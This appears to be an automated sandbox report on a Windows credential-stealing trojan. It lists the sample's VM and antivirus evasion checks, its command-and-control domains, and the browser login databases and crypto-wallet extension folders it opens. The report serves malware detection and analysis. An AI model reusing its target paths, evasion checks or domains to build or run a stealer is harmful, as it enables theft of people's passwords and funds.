              Source: 00000000.00000002.1608123380.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
              Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@12/2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00437DD0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,0_2_00437DD0
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4048
              Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\0ecc5d84-3567-499f-812e-0117fa816a25Jump to behavior
              Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000000.00000003.1287586229.0000000002E25000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1301434629.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1287255165.0000000002E54000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: file.exeReversingLabs: Detection: 63%
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4048 -s 1856
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msimg32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msvcr100.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043E0D0 push eax; mov dword ptr [esp], E2E1E0BFh0_2_0043E0D1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004429CA push ebx; ret 0_2_004429CB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00421B44 push 00000076h; retf 0_2_00421B46
              Source: file.exeStatic PE information: section name: .text entropy: 7.749741592856494
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 2268Thread sleep time: -180000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: Amcache.hve.10.drBinary or memory string: VMware
              Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
              Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
              Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
              Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
              Source: file.exe, 00000000.00000003.1301078185.0000000002E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
              Source: Amcache.hve.10.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
              Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
              Source: file.exe, 00000000.00000003.1274773836.000000000072E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274971821.000000000072E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1608203623.000000000072B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1608203623.00000000006DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
              Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
              Source: Amcache.hve.10.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
              Source: Amcache.hve.10.drBinary or memory string: vmci.sys
              Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
              Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
              Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
              Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
              Source: Amcache.hve.10.drBinary or memory string: VMware20,1
              Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.10.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
              Source: Amcache.hve.10.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.10.drBinary or memory string: VMware PCI VMCI Bus Device
              Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
              Source: Amcache.hve.10.drBinary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.10.drBinary or memory string: VMware Virtual RAM
              Source: Amcache.hve.10.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
              Source: Amcache.hve.10.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
              Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
              Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
              Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
              Source: Amcache.hve.10.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
              Source: Amcache.hve.10.drBinary or memory string: VMware Virtual USB Mouse
              Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
              Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin
              Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.
              Source: Amcache.hve.10.drBinary or memory string: VMware20,1hbin@
              Source: Amcache.hve.10.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
              Source: Amcache.hve.10.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.10.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
              Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
              Source: file.exe, 00000000.00000003.1300763670.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696492231p
              Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
              Source: Amcache.hve.10.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.10.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
              Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
              Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin`
              Source: Amcache.hve.10.drBinary or memory string: \driver\vmci,\driver\pci
              Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
              Source: Amcache.hve.10.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.10.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
              Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043C7A0 LdrInitializeThunk,0_2_0043C7A0

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: file.exeString found in binary or memory: bashfulacid.lat
              Source: file.exeString found in binary or memory: tentabatte.lat
              Source: file.exeString found in binary or memory: curverpluch.lat
              Source: file.exeString found in binary or memory: talkynicer.lat
              Source: file.exeString found in binary or memory: shapestickyr.lat
              Source: file.exeString found in binary or memory: manyrestro.lat
              Source: file.exeString found in binary or memory: slipperyloo.lat
              Source: file.exeString found in binary or memory: wordyfindy.lat
              Source: file.exeString found in binary or memory: enterwahsh.biz
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Amcache.hve.10.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.10.drBinary or memory string: msmpeng.exe
              Source: Amcache.hve.10.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: Amcache.hve.10.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
              Source: Amcache.hve.10.drBinary or memory string: MsMpEng.exe
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 4048, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: file.exeString found in binary or memory: ets/Electrum-LTC
              Source: file.exe, 00000000.00000002.1608203623.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: file.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
              Source: file.exe, 00000000.00000002.1608203623.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: file.exe, 00000000.00000003.1286771741.0000000000783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 0971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wa
              Source: file.exeString found in binary or memory: Wallets/Exodus
              Source: file.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: file.exeString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
